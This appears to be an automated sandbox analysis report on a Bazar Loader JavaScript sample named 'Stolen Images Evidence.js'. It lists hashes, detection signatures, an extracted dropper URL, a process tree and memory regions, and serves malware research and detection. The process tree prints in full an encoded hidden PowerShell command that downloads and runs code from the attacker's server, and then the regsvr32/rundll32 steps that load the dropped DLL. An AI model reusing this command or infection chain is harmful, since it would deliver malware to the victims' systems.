Analysis

  • max time kernel
    136s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    14-10-2021 18:11

General

  • Target

    Stolen Images Evidence.js

  • Size

    19KB

  • MD5

    c62b322046bee6a5a86c4fecf5dee72e

  • SHA1

    18a381be8472fcee623c18cb1bfcf938682bef7d

  • SHA256

    edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01

  • SHA512

    2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://bobersok.top/333g100/index.php

Signatures

  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

  • Bazar/Team9 Loader payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:576
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
          4⤵
          • Loads dropped DLL
          PID:1680
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat,DllRegisterServer {749609AF-8C93-44BA-A2BA-C66B158CBE86}
    1⤵
    • Loads dropped DLL
    PID:1904

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
    MD5

    58d1d95824f5687dd9dc113def8ef0db

    SHA1

    4ccac5744e86ee05b09f40bfd1f9971e082eb5ae

    SHA256

    8a5e76f924b8dca3d5e34b86289a9195f705ec7072cd527071951a512c85e825

    SHA512

    50713dd2c2ca693836b582ac12e396c3f5bd552b41b7dca6bd128cac4c1fbe281f2b3f58256daca80c7784c9307d0954496415b1e1a74b79601250e374428951

  • \Users\Admin\AppData\Local\Temp\FHbKnfj.dat
    MD5

    58d1d95824f5687dd9dc113def8ef0db

    SHA1

    4ccac5744e86ee05b09f40bfd1f9971e082eb5ae

    SHA256

    8a5e76f924b8dca3d5e34b86289a9195f705ec7072cd527071951a512c85e825

    SHA512

    50713dd2c2ca693836b582ac12e396c3f5bd552b41b7dca6bd128cac4c1fbe281f2b3f58256daca80c7784c9307d0954496415b1e1a74b79601250e374428951

  • \Users\Admin\AppData\Local\Temp\FHbKnfj.dat
    MD5

    58d1d95824f5687dd9dc113def8ef0db

    SHA1

    4ccac5744e86ee05b09f40bfd1f9971e082eb5ae

    SHA256

    8a5e76f924b8dca3d5e34b86289a9195f705ec7072cd527071951a512c85e825

    SHA512

    50713dd2c2ca693836b582ac12e396c3f5bd552b41b7dca6bd128cac4c1fbe281f2b3f58256daca80c7784c9307d0954496415b1e1a74b79601250e374428951

  • memory/576-58-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp
    Filesize

    11.4MB

  • memory/576-60-0x00000000023B2000-0x00000000023B4000-memory.dmp
    Filesize

    8KB

  • memory/576-59-0x00000000023B0000-0x00000000023B2000-memory.dmp
    Filesize

    8KB

  • memory/576-61-0x00000000023B4000-0x00000000023B7000-memory.dmp
    Filesize

    12KB

  • memory/576-62-0x00000000023BB000-0x00000000023DA000-memory.dmp
    Filesize

    124KB

  • memory/576-56-0x0000000000000000-mapping.dmp
  • memory/1116-54-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp
    Filesize

    8KB

  • memory/1372-55-0x0000000000000000-mapping.dmp
  • memory/1680-63-0x0000000000000000-mapping.dmp
  • memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp
    Filesize

    160KB

  • memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp
    Filesize

    160KB